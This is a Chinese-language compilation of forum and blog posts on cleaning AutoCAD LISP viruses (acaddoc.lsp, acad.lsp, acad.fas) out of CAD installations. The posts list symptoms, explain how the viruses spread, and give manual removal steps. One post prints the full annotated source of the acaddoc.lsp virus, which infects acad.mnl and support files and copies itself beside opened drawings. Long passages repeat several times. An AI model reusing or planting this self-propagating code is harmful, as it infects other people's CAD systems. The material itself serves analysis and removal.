CAD中lsp病毒处理办法

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

如果CAD 鼠标中键不能平移，而是弹出下拉菜单，修改系统变量mbuttonpan的值为1，重新打开CAD后鼠标中键还是一样不能平移，有什么方法能够恢复原来的中键平移功能呢？1、清除LSP病毒文件说明该病毒是以前那个炸开命令不能使用病毒的变种，它修改了这4个系统变量的值。

(setvar "zoomfactor" 12)(setvar"mbuttonpan" 0)(setvar"HIGHLIGHT" 0)(setvar "fillmode" 0)这4个系统变量的默认值是：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)（系统变量的相关说明请打开CAD后按F1键查看帮助文档。

）它不像以前的病毒那样，让一些命令无法使用，而是修改了几个系统变量使我们的操作不方便。

它的传播方式跟以前一样，只能在CAD支持路径和打开DWG文件时传播。

大家可以试试下面的方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40）(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

常见AutoCAD病毒（acad.fas、acad.lsp）清除方法没有删除干净吧。

“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD 部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

CAD恶意程序清除工具，支持CAD2002-2010版本。

程序根据“病毒及信任文件”列表搜索、删除CAD恶意程序并清除其加载项。

大家在工作中，打开自己或别人拷贝来的DWG文件前，不要忙着打开CAD，先看看这个DWG图纸目录内，有没有acad.lsp、acad.fas和acad.vlx这些的文件，有就应该立即清除该文件。

这样可以大大减少“CAD恶意程序”传播的机会。

手工清除方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。

注意：“搜索范围”一定要选择“本地硬盘(C:;D:;E:;...)”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”和“搜索子文件夹”项都勾选上，否则不能完全搜索出这些文件。

③、复制代码“(setvar "zoomfactor" 40)(setvar "mbuttonpan"1)(setvar "highlight" 1)(se tvar "fillmode" 1)(setvar "pickauto" 1)”粘贴在CAD命令行，恢复被修改的系统变量；④、清除残留的加载项，复制“(startapp "notepad" (findfile "acad.mnl"))”在CAD命令行，打开“acad.mnl”文件，查看文件内是否有类似“(load "acadappp")”或“(load "acadappp.lsp")”这样的内容，有则删去这些内容后保存“acad.mnl”文件；无可忽略此操作。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

acaddoc.lsp病毒文件彻底清除方法(2012-05-20 23:33:17)转载▼分类：电脑知识标签：杂谈前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp 的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD 开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

常见AutoCAD病毒(acad.fas、acad.lsp)清除方法
acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了，并且往往同时出现。

由于其本身对系统并不具备危害性，仅仅是恶作剧程序罢了，因此大多数防病毒软件对它们不起作用，下面介绍手动删除方法。

第一步：查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个文件并删除干净（查找前请将显示隐藏和系统文件打开，这五个文件不一定同时出现。

强烈建议使用Total Commander文件管理器查找）。

第二步：查找acad.mnl文件（这个文件通常有两个，一个在“c:\Program Files\AutoCAD****\UserDataCache\Support\”文件夹下，另一个在“c:\Documents and Settings\你的用户名\Application
Data\Autodesk\AutoCAD****\R****\chs\Support\”文件夹下。

目前病毒仅修改第一个acad.mnl文件）。

打开acad.mnl文件，在文件末尾找到以下三个语句的组合并删除（这三个语句组合不一定同时出现），然后保存文件。

(if (null stol) (load "lcm" ""))
(princ)
(load "acadapp.lsp")
(princ)
(load "acadappp.lsp")
(princ)。

关于lisp病毒的处理方法（尼个病毒用360、金山、瑞星等杀毒软件都无办法清除的。

）近日我看到从事设计工作的朋友被cad病毒（acad.lsp）所困扰，具体表现就是在绘制某些图纸时，cad的一些命令（如炸开/分解（explode））失灵，并且存盘后会生成名为acad.lsp的文件，将图纸发给其他同事协作时，他们的cad也会出现同样的问题……，其严重影响我们的制图效率及质量，个中郁闷也只有常用autocad的人才明白。

其实这是cad病毒在作怪。

用windows记事本打开acad.lsp文件，发现开头部分的代码如下：(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad newacadnowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2)(setq old_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq path (findfile "base.dcl"))(setq path (substr path 1 (- (strlen path) 8)))(setq mnlpath (getvar "menuname"))(setq nowdwg (getvar "dwgname"))(setq wjqm (findfile nowdwg))(setq dwgpath(substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))(setq acadpath (findfile "acad.lsp"))(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))……要想如何解决它，首先需要了解它。

关于AutoCAD中的LISP病毒目前CADr14有一种lisp代码具备病毒的特征，有一定危害具体情况如下：在有DW G文件里如果带有ACA D.LSP双击打开DW G文件，就会自动加载这个lisp，此lisp的功能是：加载后炸开命令外部引用等命令失效。

并且可传染：加载后在你SUPPORT目录下生成一个ACA DAPP.slp，在ACA D添加(LOAD "ACA DAPP") (PRINC)这样以后你打开acad就自动加载了ACA DAPP，它在你每个操作过的acad图形文件的文件夹下生成带恶意代码的A CAD.LSP这样如果你复制整个文件夹，或者通过局域网打开图形，就会导致在不同的机器内传染。

问题现象：EXPLODE命令失效（同时还有XREF、XBIND）；每个编辑过dwg文件的目录下面都会有一个acad.lsp；保存至另一目录时也同时产生acad.lsp；打开别人的文件时，如果该目录下有acad.lsp，那么你必中招。

解决办法一: Autocad\\support\\下建立一个acad.lsp的空白文件,并将文件属性置为只读,你自己不会具有二次传染性,可以阻止病毒的扩散.如果中毒就删掉图形目录下的acad.lsp,最好进行网络全体搜索清除清除。

解决方法二：用.Explode（在命令前加小数点“.”）可以分解；删除所有这些acad.lsp文件。

解决方法三：有个免疫设置的方法，将support目录下的ACA D.lsp设为只读，如果有ACADAPP.lsp就清空后也将其设为只读。

病毒名称Harm.Bursted该病毒是使用绘图软件：AutoCAD的内嵌脚本语言的写成，文件名为："acad.lsp" 可由AutoCAD启动时自动执行，但它不影响图形文件。

此病毒使AutoCAD的内部命令－EXPLODE, XREF 和XBIND无效，并定义一个新的命令BRUST，此命令将显示如下消息：BURST----将图块中的文字炸开后成为实体中了病毒"ASL.Bursted.A"病毒之解決方案我的電腦昨日中毒諾頓掃描後顯示說D:\RECYCLER\S－1-5-21-299502267-2139871995-726345543-1003\Dd44.rar感染ASL.Bursted.A病毒我從網路上各網站找沒有確切的方案有的說刪掉該檔案<有的提供出殺毒小軟件但均無法刪除但我從各論壇的的二次開發看到一段很重要的話ACAD有个很大的优点就是开放性它有很多开放的接口这给用户自定义以及第三方二次开发提供了极大的方便。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

关于AutoCAD中的LISP病毒目前CADr14有一种lisp代码具备病毒的特征，有一定危害具体情况如下：在有DW G文件里如果带有ACA D.LSP双击打开DW G文件，就会自动加载这个lisp，此lisp的功能是：加载后炸开命令外部引用等命令失效。

并且可传染：加载后在你SUPPORT目录下生成一个ACA DAPP.slp，在ACA D添加(LOAD "ACA DAPP") (PRINC)这样以后你打开acad就自动加载了ACA DAPP，它在你每个操作过的acad图形文件的文件夹下生成带恶意代码的A CAD.LSP这样如果你复制整个文件夹，或者通过局域网打开图形，就会导致在不同的机器内传染。

问题现象：EXPLODE命令失效（同时还有XREF、XBIND）；每个编辑过dwg文件的目录下面都会有一个acad.lsp；保存至另一目录时也同时产生acad.lsp；打开别人的文件时，如果该目录下有acad.lsp，那么你必中招。

解决办法一: Autocad\\support\\下建立一个acad.lsp的空白文件,并将文件属性置为只读,你自己不会具有二次传染性,可以阻止病毒的扩散.如果中毒就删掉图形目录下的acad.lsp,最好进行网络全体搜索清除清除。

解决方法二：用.Explode（在命令前加小数点“.”）可以分解；删除所有这些acad.lsp文件。

解决方法三：有个免疫设置的方法，将support目录下的ACA D.lsp设为只读，如果有ACADAPP.lsp就清空后也将其设为只读。

病毒名称Harm.Bursted该病毒是使用绘图软件：AutoCAD的内嵌脚本语言的写成，文件名为："acad.lsp" 可由AutoCAD启动时自动执行，但它不影响图形文件。

此病毒使AutoCAD的内部命令－EXPLODE, XREF 和XBIND无效，并定义一个新的命令BRUST，此命令将显示如下消息：BURST----将图块中的文字炸开后成为实体中了病毒"ASL.Bursted.A"病毒之解決方案我的電腦昨日中毒諾頓掃描後顯示說D:\RECYCLER\S－1-5-21-299502267-2139871995-726345543-1003\Dd44.rar感染ASL.Bursted.A病毒我從網路上各網站找沒有確切的方案有的說刪掉該檔案<有的提供出殺毒小軟件但均無法刪除但我從各論壇的的二次開發看到一段很重要的話ACAD有个很大的优点就是开放性它有很多开放的接口这给用户自定义以及第三方二次开发提供了极大的方便。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp 的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl 与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。